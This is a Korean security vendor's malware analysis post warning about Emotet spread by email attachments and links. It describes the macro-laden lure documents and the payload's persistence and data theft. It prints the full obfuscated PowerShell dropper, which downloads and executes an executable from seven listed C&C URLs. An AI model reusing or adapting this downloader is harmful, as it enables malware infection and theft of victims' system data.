포스팅 내용

악성코드 분석 리포트

이메일 첨부파일로 국내외 대량 유포 중인 이모텟(Emotet) 악성코드 주의



안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터)입니다.


최근 이모텟 악성코드가 국내 외로 유포되고 있어 이용자들의 주의 부탁드립니다. 


공격자는 불특정 다수를 대상으로 이메일, 메시지를 통하여 이모텟 악성코드를 유포중입니다. 실제 악성 행위 수행하는 파일 유포 방법은 스크립트가 삽입된 악성 문서 파일을 첨부하거나 특정 URL로 클릭을 유도하여 최종 페이로드 다운로드를 유도합니다.



[그림 1] 첨부파일이 포함된 이모텟 유포 악성 메일



[그림 2] 링크가 포함된 이모텟 악성 메일 유형

 



악성 문서 파일을 첨부하여 유포된 경우, 아래와 같은 3가지 케이스로 위장하여 유포되며 파워셸을 통하여 악성코드를 다운로드하는 스크립트가 첨부되어 있습니다.




[그림 3] 악성 문서 템플릿 1



[그림 4] 악성 문서 템플릿 2



[그림 5] 악성 문서 템플릿 3



아래는 문서에 포함된 매크로입니다



[그림 6] 매크로 코드의 일부




삽입된 파워셸 스크립트와 C&C는 아래와 같습니다.

 

$F74ycr7=('D'+('k'+'hn1')+'2u');&('n'+'ew'+'-item') 

$Env:teMP\WOrD\2019\ -itemtype dirEctoRY;[Net.ServicePointManager]::"s`Ecuri`Typro`Tocol" = (('tls'+'1')+('2, '+'t')+('ls11,'+' '+'t')+'ls');

$Rkw7usl = (('D1'+'1on')+'g'+'43');$Ci348_k=('V2'+('nyk8'+'l'));

$Urqr5m8=$env:temp+((('T'+'4Zwo')+('rdT4Z'+'2')+('0'+'19')+'T'+'4Z')  -cReplACE  ([CHar]84+[CHar]52+[CHar]90),[CHar]92)+$Rkw7usl+('.'+('e'+'xe'));

$Hltfun9=('X3'+'54'+('92'+'b'));

$Ebzr64x=.('new'+'-obj'+'ect') net.WeBCLIEnT;

$Cgg8bo4=(('h'+'tt')+'p'+':'+('//'+'ma')+'s'+'qu'+'e'+('.e'+'s')+('/s'+'tat')+('/'+'HW')+'D'+'zR'+('/*h'+'ttp:'+'//me')+'sd'+'el'+('i'+'cesital')+'i'+'en'+('s.'+'f'+'r/wp')+'-a'+('d'+'mi'+'n/f')+('ile/'+'IIc')+('k/*http'+':')+('//'+'lidis'+'c')+'om'+('.'+'com.')+('b'+'r/B')+('KP_'+'Tin'+'aP'+'OS'+'/at'+'tach/')+'Ul'+'i'+('j'+'fEK')+'/'+('*'+'ht')+('tp'+':')+('/'+'/facanh'+'a.'+'co'+'m.br/temp/')+'f'+('ile'+'/')+'V'+'F'+('yi'+'tEUEZ')+('/*ht'+'t'+'ps://'+'at'+'tech.')+('ml/'+'w')+('p-'+'admin')+('/yZDB'+'l'+'Y')+('kJ'+'tq')+'/*'+'ht'+('t'+'p://')+('ad'+'mve'+'r')+'o.'+'co'+'m'+('.b'+'r/mi')+('nh'+'aa')+('gu'+'a'+'/'+'hLwOiX/*'+'htt')+'p'+'s:'+('//d'+'ev')+'.'+('dos'+'il')+'y'+'.'+'i'+('n/w'+'p-c')+'on'+('te'+'n')+'t/'+('a'+'ttach/zdR'+'HVD'+'Cw')+'l'+'/')."SP`lIt"([char]42);

$Bn0idni=('X'+('i'+'7ag')+'a5');

foreach($Up90jr9 in $Cgg8bo4){try{$Ebzr64x."Dow`NLoAD`F`ilE"($Up90jr9, $Urqr5m8);$K3c6jw2=(('H'+'b7')+('fg'+'rh'));

If ((.('Get'+'-'+'Item') $Urqr5m8)."LEnG`Th" -ge 22028) {.('Invok'+'e'+'-'+'Item')($Urqr5m8);

$Hw80cs9=('Fi'+'lr'+('9'+'u8'));

break;

$Anfyg5p=('F9'+('bsdf'+'p'))}}catch{}}$Ul7o96m=(('D'+'3ao')+('pj'+'o'))

[표 1] 파워셸 스크립트 코드

 

http://masque[.]es/stat/HWDzR/

http://mesdelicesitaliens[.]fr/wp-admin/file/IIck/

http://lidiscom.com[.]br/BKP_TinaPOS/attach/UlijfEK/

http://facanha.com[.]br/temp/file/VFyitEUEZ/

https://attech[.]ml/wp-admin/yZDBlYkJtq/

http://admvero[.]com[.]br/minhaagua/hLwOiX/

https://dev.dosily[.]in/wp-content/attach/zdRHVDCwl/

[표 2] 이모텟 다운로드 C&C 주소 리스트



위 C&C를 통해 다운로드 되는 페이로드는 ‘%SYSTEMROOT%\system32’, ‘%appdata%’하위로 자가복제합니다. 주 악성 행위는 C&C인 190.136.179[.]102로 감염PC 정보(컴퓨터 이름, 볼륨 정보, 윈도우 버전, 네트워크 정보, 프로세스 리스트) 전송하며 최종 페이로드 Emotet 악성 코드 다운로드를 수행합니다. 



[그림 7] 자동 실행 레지스트리 등록 화면



[그림 8] 감염PC 정보 전송 화면



따라서, 이스트시큐리티 알약(ALYac) 백신 프로그램에서는 국내외에서 발견되는 최신 이모텟 악성파일 탐지 및 치료 기능을 지속적으로 추가하고 있으므로 항상 최신 버전으로 업데이트를 유지하고, 실시간 감시 기능 등을 활성화하는 것이 좋습니다.


현재 알약에서는 해당 악성코드들에 대해 Trojan.Downloader.DOC.gen, Trojan.Agent.Emotet으로 탐지중에 있습니다.




티스토리 방명록 작성
name password homepage